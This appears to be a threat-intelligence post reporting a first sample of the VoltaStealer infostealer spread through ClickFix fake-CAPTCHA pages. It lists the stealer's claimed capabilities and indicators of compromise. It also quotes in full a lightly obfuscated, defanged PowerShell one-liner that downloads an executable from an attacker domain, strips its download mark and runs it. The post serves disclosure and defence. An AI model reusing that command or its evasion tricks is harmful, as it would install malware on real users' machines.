👻 VoltaStealer was basically a ghost story. A slick, evasion-obsessed new infostealer hyped by its author on dark web forums, but no one reported seeing one in the wild, until now.
While tracking a ClickFix actor, we pivoted on a known IOC into an open directory holding a very interesting payload. Artifacts and circumstantial evidence point to one suspect: VoltaStealer. We believe this is the first known sample. 🔬
The delivery is textbook verification and fatigue bait: fraudulent sites dressed up as "security checks" and fake CAPTCHAs. Tick the "I'm not a robot" box and the page silently copies a malicious PowerShell one-liner to your clipboard. The ClickFix lure page then instructs victims to open the Windows Run dialog and enter the paste hotkey command, which fetches the malware. No exploit required, just a checkbox and trust. 🤖
What VoltaStealer claims it can do (per its own MaaS sales pitch, surfaced via Axur's dark web monitoring):
🔴 Runs fully in memory — custom encryption/obfuscation, minimal disk artifacts
🔴 Heavy evasion — anti-VM/sandbox/debug, direct syscalls, runtime FUD, ~75% build uniqueness, chunked exfil to stay quiet
🔴 Grabs everything — passwords, cookies, auth tokens, browser + desktop crypto wallets, Telegram sessions, VPN configs, and files via regex scanning
🔴 Fast & greedy — 5–10s execution, ~95% "hit rate" claim, partial upload even if interrupted, no persistence
🔴 Full storefront — web panel + builder, dashboards, API, team roles, clipper/loader/file-grabber modules, tiered subs
In other words: vapor no more. 💨
â›” VoltaStealer C2:
usevolta[.]su
â›” VoltaStealer Payloads (SHA256):
2be779fc085dd89cf9e042cbcf32ee6da0cd0e3106e9dca49d52b7a839b1aa8f
253f53b2453f8bff642421cfa5d851af8fc7100409397d80643bd792a7e38edb
â›” ClickFix PowerShell command (Not VoltaStealer):
command: "powershell -nop -w h -ep bypass -c \"$u='hXXps[:]//plonkert[.]cfd/de372ad5.exe';$f=$env:TEMP+'\\\\x.exe';$w=[Net.WebClient]::new();$w.('Down'+'loadFile')($u,$f);Unblock-File $f -EA 0;ri ($f+':Zone.Identifier') -EA 0;$env:SEE_MASK_NOZONECHECKS=1;& $f"
â›” Malware payload (Not VoltaStealer) dropped via ClickFix malicious command (SHA256):
6a6f16d7202e64fea38a757b5151a39099124a1bf55ba55e62d58f3ae102f7e8
â›” ClickFix actor domains:
comalign[.]pro
zorivian[.]pro
nexalora[.]pro
kovraxis[.]com
mevrio[.]com
krebbo[.]world
wobblify[.]cfd
yovu[.]world
glimmerix[.]pro
launcherpatch[.]com
grembix[.]cfd
wumlo[.]shop
plonkert[.]cfd
volpo[.]cfd
fleepax[.]cfd
zixlo[.]cfd
quobnar[.]world
riotmourner[.]pro
youfound[.]fun
Rule of thumb: real CAPTCHAs don't ask you to open the Windows Run dialog and paste in a command. If one does, close the page. 🛑
#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #clickfix #infostealer #voltastealer #maas #malware #captcha #axur


